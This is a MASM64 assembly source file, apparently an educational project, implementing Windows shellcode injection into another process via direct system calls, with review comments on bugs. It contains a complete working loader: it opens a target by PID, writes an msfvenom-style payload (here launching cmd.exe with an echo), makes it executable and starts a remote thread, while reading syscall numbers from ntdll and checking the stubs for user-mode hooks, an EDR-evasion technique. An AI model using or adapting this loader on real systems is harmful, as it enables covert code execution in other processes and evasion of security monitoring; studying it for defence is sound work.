; /*
;
; @author: 0xbekoo
; @Project: Direct system calls with MASM64 assembly (Windows x64, Microsoft x64 calling convention)
; @Last Update: 2024-12-18
;
; @Warning: This project is for educational purposes only. Use it only on systems you own or are authorised to test; the author accepts no responsibility for illegal use.
;
; */
include utils.inc
include syscalls.inc
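.const
; Target process id.  Set this before assembling; 0 makes the program exit at once.
; It must be a 32-bit field: the entry point reads it with `dword ptr [PID]`, and a
; WORD here would both truncate PIDs above 65535 and let that read pick up two bytes
; of whatever follows in this section.
PID                     DD      0
ALL_ACCESS              equ     1FFFFFh     ; used for both the process and the thread handle
PAGE_EXECUTE_READWRITE  equ     40h
MEM_COMMIT_RESERVE      equ     3000h       ; MEM_COMMIT (1000h) | MEM_RESERVE (2000h)
PAGE_EXECUTE_READ       equ     20h         ; final protection of the remote region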
.data
; In/out RegionSize shared by NtAllocateVirtualMemory and NtProtectVirtualMemory;
; both write the page-rounded size back into it, so after the allocation it no
; longer equals the payload length.
ShellcodeSize   QWORD   0
; Receives the previous page protection from NtProtectVirtualMemory (PULONG).
OldProtect      DWORD   0
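.code
; /*
; Payload copied into the target process.  It is only *read* here (NtWriteVirtualMemory
; is the sole consumer), so it could equally live in .data or .const.
; The byte pattern -- cld / and rsp,-16 / call +0C0h, a PEB walk through gs:[60h],
; ROR-13 API-name hashing -- matches the usual msfvenom-style windows/x64/exec stub.
; NOTE(review): not re-verified instruction by instruction.  The trailing bytes spell
; the command it runs:
;     cmd.exe /K "echo Direct Syscalls with masm64"
; */
Shellcode BYTE 0fch, 048h, 083h, 0e4h, 0f0h, 0e8h, 0c0h, 000h, 000h, 000h, 041h, 051h, 041h, 050h, 052h
BYTE 051h, 056h, 048h, 031h, 0d2h, 065h, 048h, 08bh, 052h, 060h, 048h, 08bh, 052h, 018h, 048h
BYTE 08bh, 052h, 020h, 048h, 08bh, 072h, 050h, 048h, 00fh, 0b7h, 04ah, 04ah, 04dh, 031h, 0c9h
BYTE 048h, 031h, 0c0h, 0ach, 03ch, 061h, 07ch, 002h, 02ch, 020h, 041h, 0c1h, 0c9h, 00dh, 041h
BYTE 001h, 0c1h, 0e2h, 0edh, 052h, 041h, 051h, 048h, 08bh, 052h, 020h, 08bh, 042h, 03ch, 048h
BYTE 001h, 0d0h, 08bh, 080h, 088h, 000h, 000h, 000h, 048h, 085h, 0c0h, 074h, 067h, 048h, 001h
BYTE 0d0h, 050h, 08bh, 048h, 018h, 044h, 08bh, 040h, 020h, 049h, 001h, 0d0h, 0e3h, 056h, 048h
BYTE 0ffh, 0c9h, 041h, 08bh, 034h, 088h, 048h, 001h, 0d6h, 04dh, 031h, 0c9h, 048h, 031h, 0c0h
BYTE 0ach, 041h, 0c1h, 0c9h, 00dh, 041h, 001h, 0c1h, 038h, 0e0h, 075h, 0f1h, 04ch, 003h, 04ch
BYTE 024h, 008h, 045h, 039h, 0d1h, 075h, 0d8h, 058h, 044h, 08bh, 040h, 024h, 049h, 001h, 0d0h
BYTE 066h, 041h, 08bh, 00ch, 048h, 044h, 08bh, 040h, 01ch, 049h, 001h, 0d0h, 041h, 08bh, 004h
BYTE 088h, 048h, 001h, 0d0h, 041h, 058h, 041h, 058h, 05eh, 059h, 05ah, 041h, 058h, 041h, 059h
BYTE 041h, 05ah, 048h, 083h, 0ech, 020h, 041h, 052h, 0ffh, 0e0h, 058h, 041h, 059h, 05ah, 048h
BYTE 08bh, 012h, 0e9h, 057h, 0ffh, 0ffh, 0ffh, 05dh, 048h, 0bah, 001h, 000h, 000h, 000h, 000h
BYTE 000h, 000h, 000h, 048h, 08dh, 08dh, 001h, 001h, 000h, 000h, 041h, 0bah, 031h, 08bh, 06fh
BYTE 087h, 0ffh, 0d5h, 0bbh, 0f0h, 0b5h, 0a2h, 056h, 041h, 0bah, 0a6h, 095h, 0bdh, 09dh, 0ffh
BYTE 0d5h, 048h, 083h, 0c4h, 028h, 03ch, 006h, 07ch, 00ah, 080h, 0fbh, 0e0h, 075h, 005h, 0bbh
BYTE 047h, 013h, 072h, 06fh, 06ah, 000h, 059h, 041h, 089h, 0dah, 0ffh, 0d5h, 063h, 06dh, 064h
BYTE 02eh, 065h, 078h, 065h, 020h, 02fh, 04bh, 020h, 022h, 065h, 063h, 068h, 06fh, 020h, 044h
BYTE 069h, 072h, 065h, 063h, 074h, 020h, 053h, 079h, 073h, 063h, 061h, 06ch, 06ch, 073h, 020h
BYTE 077h, 069h, 074h, 068h, 020h, 06dh, 061h, 073h, 06dh, 036h, 034h, 000h
; Length of the whole payload, computed at assembly time.  Do NOT use `sizeof Shellcode`
; for this: SIZEOF/LENGTHOF only cover the FIRST line of a multi-line data definition
; (15 bytes above).  The original build only worked because NtAllocateVirtualMemory
; rounds the region size up to a page and writes that rounded size back into
; ShellcodeSize, so the subsequent write copied a whole page of .code instead of 15 bytes.
SHELLCODE_SIZE = $ - Shellcode

; Initial protection of the remote region: writable, not executable.  It is switched to
; PAGE_EXECUTE_READ by NtProtectVirtualMemory after the payload has been written, so the
; region is never writable and executable at the same time.
PAGE_READWRITE equ 04h

; RESOLVE_SSN fnString
;   Look up <fnString> in ntdll (NTDLLAddress must already be set), validate the result,
;   and leave the function's SSN in eax via GetSSN.  rax must not be touched between this
;   macro and the My_pNt* wrapper that issues the syscall -- the wrappers in syscalls.inc
;   are assumed to take the service number from eax (TODO confirm there).
;   Clobbers: rax, rcx, rdx, plus whatever GetSpecificFunction / CheckFunctionResult clobber.
RESOLVE_SSN MACRO fnString
    lea     rdx,[fnString]
    mov     rcx,NTDLLAddress
    call    GetSpecificFunction
    xor     rdx,rdx                         ; no output slot for CheckFunctionResult
    mov     rcx,rax
    call    CheckFunctionResult
    mov     rcx,rax
    call    GetSSN
ENDM

; /*
; mainCRTStartup - program entry point (no CRT).  Opens the process whose id is in PID,
; allocates a remote region, copies the payload into it, makes it executable, starts a
; thread on it and waits for that thread, then hands both handles to ExitProgram.
; Every Nt* call goes through a direct-syscall wrapper whose SSN is read from the ntdll
; stub immediately before the call.
;
; Stack: the return address is already on the stack on entry, so a 38h-byte frame
; (20h shadow space + 18h for stack args) gives rsp % 16 == 0 at each call.
; NtCreateThreadEx has 11 parameters (7 on the stack) and needs 58h instead.
;
; NOTE(review): GetSpecificFunction / CheckFunctionResult / GetSSN are called with no
; shadow space and rsp % 16 == 8; that is only safe if those helpers (utils.inc) build
; their own frame before calling anything themselves -- confirm there.
; */
mainCRTStartup PROC
    mov     ecx,dword ptr [PID]             ; PID must be a DWORD field in .const
    test    ecx,ecx
    jz      Exit                            ; PID not set: nothing to inject into
    call    PrepareStructures               ; CID.UniqueProcess = ecx, ObjAttr = {Length}

    ; ntdll base.  GetModuleHandleA is a Win32 import: shadow space + alignment required.
    sub     rsp,38h
    lea     rcx,[NTDLLString]
    call    GetModuleHandleA
    add     rsp,38h
    lea     rdx,[NTDLLAddress]              ; CheckFunctionResult stores the base here
    mov     rcx,rax
    call    CheckFunctionResult

    ; NtOpenProcess(&HandleProcess, ALL_ACCESS, &ObjAttr, &CID)
    ; NOTE(review): PROCESS_ALL_ACCESS is broader than this sequence needs; the documented
    ; minimum for remote alloc/write/protect/create-thread is PROCESS_CREATE_THREAD |
    ; PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ
    ; -- consider narrowing.
    RESOLVE_SSN NtOpenProcessString
    sub     rsp,38h
    lea     r9,CID
    lea     r8,ObjAttr
    mov     edx,ALL_ACCESS
    lea     rcx,HandleProcess
    call    My_pNtOpenProcess
    add     rsp,38h
    test    rax,rax                         ; anything but STATUS_SUCCESS aborts
    jnz     Exit

    ; NtAllocateVirtualMemory(HandleProcess, &RemoteBuffer, 0, &ShellcodeSize,
    ;                         MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE)
    ; ShellcodeSize is in/out: the kernel writes the page-rounded region size back.
    RESOLVE_SSN NtAllocateVirtualString
    mov     ecx,SHELLCODE_SIZE
    mov     ShellcodeSize,rcx
    sub     rsp,38h
    mov     dword ptr [rsp+28h],PAGE_READWRITE
    mov     dword ptr [rsp+20h],MEM_COMMIT_RESERVE
    lea     r9,ShellcodeSize
    xor     r8d,r8d                         ; ZeroBits
    lea     rdx,RemoteBuffer
    mov     rcx,HandleProcess
    call    My_pNtAllocateVirtualMemory
    add     rsp,38h
    test    rax,rax
    jnz     Exit

    ; NtWriteVirtualMemory(HandleProcess, RemoteBuffer, Shellcode, SHELLCODE_SIZE, NULL)
    ; Copy exactly the payload, not the page-rounded ShellcodeSize: the latter reads past
    ; the end of Shellcode into whatever follows it in .code.
    RESOLVE_SSN NtWriteVirtualString
    sub     rsp,38h
    mov     qword ptr [rsp+20h],0           ; NumberOfBytesWritten (optional)
    mov     r9d,SHELLCODE_SIZE
    lea     r8,Shellcode
    mov     rdx,RemoteBuffer
    mov     rcx,HandleProcess
    call    My_pNtWriteVirtualMemory
    add     rsp,38h
    test    rax,rax
    jnz     Exit

    ; NtProtectVirtualMemory(HandleProcess, &RemoteBuffer, &ShellcodeSize,
    ;                        PAGE_EXECUTE_READ, &OldProtect)
    ; Base and size are in/out here too (rounded to page boundaries).
    RESOLVE_SSN NtProtectVirtualString
    sub     rsp,38h
    lea     rcx,OldProtect
    mov     qword ptr [rsp+20h],rcx
    mov     r9d,PAGE_EXECUTE_READ
    lea     r8,ShellcodeSize
    lea     rdx,[RemoteBuffer]
    mov     rcx,HandleProcess
    call    My_pNtProtectVirtualMemory
    add     rsp,38h
    test    rax,rax
    jnz     Exit

    ; NtCreateThreadEx(&HandleThread, ALL_ACCESS, &ObjAttr, HandleProcess,
    ;                  RemoteBuffer, NULL, 0, 0, 0, 0, NULL)
    ; 11 parameters -> 7 on the stack at [rsp+20h..rsp+50h].  The frame must be 58h,
    ; not 38h: with 38h the stores at +38h..+50h land on the return address and the
    ; caller's frame.
    RESOLVE_SSN NtCreateThreadString
    mov     r10,RemoteBuffer
    sub     rsp,58h
    mov     qword ptr [rsp+50h],0           ; AttributeList
    mov     qword ptr [rsp+48h],0           ; MaximumStackSize
    mov     qword ptr [rsp+40h],0           ; StackSize
    mov     qword ptr [rsp+38h],0           ; ZeroBits
    mov     qword ptr [rsp+30h],0           ; CreateFlags (0 = run immediately)
    mov     qword ptr [rsp+28h],0           ; Argument
    mov     qword ptr [rsp+20h],r10         ; StartRoutine = RemoteBuffer
    mov     r9,HandleProcess
    lea     r8,ObjAttr
    mov     edx,ALL_ACCESS
    lea     rcx,HandleThread
    call    My_pNtCreateThreadEx
    add     rsp,58h
    test    rax,rax
    jnz     Exit

    ; NtWaitForSingleObject(HandleThread, FALSE, NULL) -- NULL timeout = wait forever
    RESOLVE_SSN NtWaitString
    sub     rsp,38h
    xor     r8d,r8d
    xor     edx,edx
    mov     rcx,HandleThread
    call    My_pNtWaitForSingleObject
    add     rsp,38h

Exit:
    ; Tail-call ExitProgram(HandleThread, HandleProcess).  On the early-exit paths one or
    ; both handles still hold their initial value -- ExitProgram (utils.inc) is assumed to
    ; tolerate that (TODO confirm).
    mov     rdx,HandleProcess
    mov     rcx,HandleThread
    jmp     ExitProgram
mainCRTStartup ENDP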
; /*
; PrepareStructures - fill the CLIENT_ID and OBJECT_ATTRIBUTES passed to NtOpenProcess.
;
; Parameters:
;   ecx - target process id
;
; Leaf; clobbers nothing but the two globals.
; NOTE(review): UniqueProcess receives a 32-bit store.  CLIENT_ID.UniqueProcess is a
; HANDLE (8 bytes on x64); confirm the struct in utils.inc declares a full-width field
; and that its upper dword is zero, or the kernel sees a garbage pid.
; */
PrepareStructures PROC
    ; CLIENT_ID: open by process id, so UniqueThread stays 0.
    mov     CID.UniqueThread,0
    mov     CID.UniqueProcess,ecx
    ; OBJECT_ATTRIBUTES: every pointer NULL, no attribute flags, only Length is set.
    mov     ObjAttr.RootDirectory,0
    mov     ObjAttr.ObjectName,0
    mov     ObjAttr.Attributes,0
    mov     ObjAttr.SecurityDescriptor,0
    mov     ObjAttr.SecurityQualityOfService,0
    mov     ObjAttr.oLength,sizeof OBJECT_ATTRIBUTES
    ret
PrepareStructures ENDP
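; /*
; GetSSN - read the system service number out of an ntdll Nt*/Zw* stub.
;
; Parameters:
;   rcx - address of the stub (as returned by GetSpecificFunction)
;
; Output:
;   rax - the 32-bit SSN, or -1 if the stub does not begin with the expected unhooked
;         prologue  4C 8B D1 (mov r10,rcx)  B8 imm32 (mov eax,SSN).
;         An out-of-range number like -1 makes the following `syscall` return a failure
;         NTSTATUS (STATUS_INVALID_SYSTEM_SERVICE) instead of dispatching to some
;         unrelated service, so the caller's status check trips.
;
; Clobbers: rax, flags.  Leaf; no stack use.
;
; Why the prologue check: if the stub has been overwritten (e.g. by a user-mode hook),
; byte 4 is not an SSN at all and the old code silently used whatever was there.
; Why a dword: the original read only one byte, but SSNs are not limited to 0..255.
; */
GetSSN PROC
    cmp     dword ptr [rcx],0B8D18B4Ch      ; little-endian "4C 8B D1 B8"
    jne     BadStub
    mov     eax,dword ptr [rcx+4]           ; imm32 of `mov eax,SSN`; zero-extends into rax
    ret
BadStub:
    mov     rax,-1
    ret
GetSSN ENDP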
END